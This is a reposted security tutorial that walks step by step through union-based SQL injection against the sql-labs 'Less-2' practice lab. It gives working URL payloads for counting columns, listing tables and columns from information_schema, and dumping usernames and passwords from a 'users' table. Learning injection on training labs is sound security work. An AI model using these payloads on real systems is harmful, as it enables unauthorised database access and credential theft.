SQL injection - digital union joint injection

Language 2023-04-08 15:07:35 views: null

Table of contents

Step 1: Determine whether it is numeric or character

Step 2: Use the group by dichotomy to determine the number of columns in the previous query in the union statement

Step 3: Optimize the statement and change the id to a number that does not exist

Step 4: Use the select statement to query the crit database name

Step 5: Use the select statement to query all table names of the target machine

Step 6: Use the select statement to query all the column names of the target machine

Step 7: Query all usernames and passwords

Take less-2 in sql-labs as an example:

Step 1: Determine whether it is numeric or character

Enter 'to determine whether there is an injection point, if an error is reported, there is an injection point

?id=1'

 Use the and statement to determine whether it is a number or a character

1=1 can be displayed normally:

1=2 cannot be displayed normally:

 

So the judgment is digital injection.

Step 2: Use the group by dichotomy to determine the number of columns in the previous query in the union statement

Because it is a digital injection, there is no need to consider the closure method at all

?id=1 order by 3 --+

Step 3: Optimize the statement and change the id to a number that does not exist

Reasons for doing this:

By default, the joint query union only displays the results of the previous statement of the union. We change the id to a number that does not exist, so that the results of the previous statement cannot be queried, and the content of the last statement is displayed.

?id=-1 union select 1,2,3  --+

 

Step 4: Use the select statement to query the database name of the target machine

?id=-1 union select 1,2,database()  --+

Step 5: Use the select statement to query all table names of the target machine

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()  --+

Step 6: Use the select statement to query all the column names of the target machine

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'  --+

Step 7: Query all usernames and passwords

?id=-1 union select 1,group_concat(username,'~',password),3 from users  --+

 

Guess you like

Origin blog.csdn.net/heyingcheng/article/details/129344827
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com